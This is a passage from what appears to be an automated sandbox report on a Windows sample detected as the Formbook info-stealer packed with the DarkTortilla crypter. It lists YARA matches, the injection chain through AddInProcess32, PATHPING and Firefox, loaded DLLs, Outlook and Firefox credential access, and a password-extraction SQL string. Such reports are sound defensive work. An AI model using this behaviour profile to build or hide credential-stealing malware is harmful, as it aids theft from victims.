              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C970E97_2_02C970E9
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9F0E07_2_02C9F0E0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE70C07_2_02BE70C0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BEB1B07_2_02BEB1B0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CAB16B7_2_02CAB16B
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C1516C7_2_02C1516C
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BCF1727_2_02BCF172
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C916CC7_2_02C916CC
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9F7B07_2_02C9F7B0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BD14607_2_02BD1460
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9F43F7_2_02C9F43F
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C7D5B07_2_02C7D5B0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C975717_2_02C97571
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C8DAC67_2_02C8DAC6
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C25AA07_2_02C25AA0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C7DAAC7_2_02C7DAAC
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C81AA37_2_02C81AA3
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9FA497_2_02C9FA49
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C97A467_2_02C97A46
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C53A6C7_2_02C53A6C
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C55BF07_2_02C55BF0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C1DBF97_2_02C1DBF9
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BFFB807_2_02BFFB80
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9FB767_2_02C9FB76
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE38E07_2_02BE38E0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C4D8007_2_02C4D800
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C759107_2_02C75910
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE99507_2_02BE9950
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BFB9507_2_02BFB950
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE9EB07_2_02BE9EB0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE1F927_2_02BE1F92
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9FFB17_2_02C9FFB1
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9FF097_2_02C9FF09
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9FCF27_2_02C9FCF2
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C59C327_2_02C59C32
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BFFDC07_2_02BFFDC0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C91D5A7_2_02C91D5A
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C97D737_2_02C97D73
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE3D407_2_02BE3D40
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004112C07_2_004112C0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040C4E87_2_0040C4E8
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040C4F07_2_0040C4F0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040C7107_2_0040C710
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040A7907_2_0040A790
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00412DDB7_2_00412DDB
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00412DE07_2_00412DE0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004013B27_2_004013B2
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00429CC07_2_00429CC0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 02C27E54 appears 102 times
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 02C5F290 appears 105 times
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 02BCB970 appears 280 times
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 02C4EA12 appears 86 times
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: String function: 02C15130 appears 58 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 01ABB970 appears 280 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 01B17E54 appears 102 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 01B05130 appears 58 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 01B4F290 appears 105 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 01B3EA12 appears 86 times
              Source: rFV23+17555.exe, 00000000.00000002.2735199295.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rFV23+17555.exe
              Source: rFV23+17555.exe, 00000000.00000002.2747919357.0000000007B30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll, vs rFV23+17555.exe
              Source: rFV23+17555.exe, 00000000.00000000.2039373453.00000000001B4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebinclittty.exeH vs rFV23+17555.exe
              Source: rFV23+17555.exe, 00000000.00000002.2742755044.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMiPro.dll, vs rFV23+17555.exe
              Source: rFV23+17555.exe, 00000000.00000002.2745500828.0000000005FA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMiPro.dll, vs rFV23+17555.exe
              Source: rFV23+17555.exeBinary or memory string: OriginalFilenamebinclittty.exeH vs rFV23+17555.exe
              Source: rFV23+17555.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 4.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: rFV23+17555.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@3/2
              Source: C:\Users\user\Desktop\rFV23+17555.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rFV23+17555.exe.logJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\PATHPING.EXEFile created: C:\Users\user\AppData\Local\Temp\-0o5F4M6Jump to behavior
              Source: rFV23+17555.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: rFV23+17555.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: PATHPING.EXE, 00000007.00000003.3131725453.0000000002792000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.3131790851.000000000277E000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3294360405.000000000277E000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3294360405.00000000027B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: rFV23+17555.exe, 00000000.00000000.2039057570.00000000001A7000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: Select SERVERADDRESS, USERNAME, PASSWORD, SERVERPORT, DBFORDATA, DBFORFILE FROM serverlist WHERE DEFAULTCONNECTION =1;
              Source: rFV23+17555.exeReversingLabs: Detection: 57%
              Source: unknownProcess created: C:\Users\user\Desktop\rFV23+17555.exe "C:\Users\user\Desktop\rFV23+17555.exe"
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"
              Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"Jump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\rFV23+17555.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: rFV23+17555.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: rFV23+17555.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: AddInProcess32.pdb source: PATHPING.EXE, 00000007.00000002.3294360405.00000000026FE000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3296262041.00000000031CC000.00000004.10000000.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000000.3018630470.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3236521411.00000000297FC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: pathping.pdb source: AddInProcess32.exe, 00000004.00000002.2952201089.0000000001644000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2952201089.0000000001638000.00000004.00000020.00020000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000002.3294736772.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gxDswOWWlPEzerVr.exe, 00000006.00000000.2876704128.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000000.3018047319.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: pathping.pdbGCTL source: AddInProcess32.exe, 00000004.00000002.2952201089.0000000001644000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2952201089.0000000001638000.00000004.00000020.00020000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000002.3294736772.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2954385045.00000000029F6000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2951842653.00000000027F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2954385045.00000000029F6000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2951842653.00000000027F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: AddInProcess32.pdbpw source: PATHPING.EXE, 00000007.00000002.3294360405.00000000026FE000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3296262041.00000000031CC000.00000004.10000000.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000000.3018630470.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3236521411.00000000297FC000.00000004.80000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected DarkTortilla Crypter
              Source: Yara matchFile source: 0.2.rFV23+17555.exe.3aea230.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rFV23+17555.exe.5fa0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rFV23+17555.exe.5fa0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rFV23+17555.exe.3aea230.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2742755044.0000000003AD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2745500828.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2735654036.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rFV23+17555.exe PID: 516, type: MEMORYSTR
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0607A157 push eax; iretd 0_2_0607A181
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07749BA8 pushad ; ret 0_2_0774A103
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07748626 pushad ; ret 0_2_07748663
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_077400BE push esp; retf 0_2_077400C1
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0774A0A5 pushad ; ret 0_2_0774A103
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07748690 push ecx; ret 0_2_077486A2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040E00E pushfd ; retf 4_2_0040E010
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040D119 push ebx; iretd 4_2_0040D11A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0042C193 push es; retf E8E4h4_2_0042C2B3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00416223 pushad ; retf DE68h4_2_0041627E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004052AE push ebx; retf 4_2_004052B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040841A push ebp; iretd 4_2_00408421
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040A55C push 0000002Eh; retf 4_2_0040A58E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040A563 push 0000002Eh; retf 4_2_0040A58E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004036A0 push eax; ret 4_2_004036A2
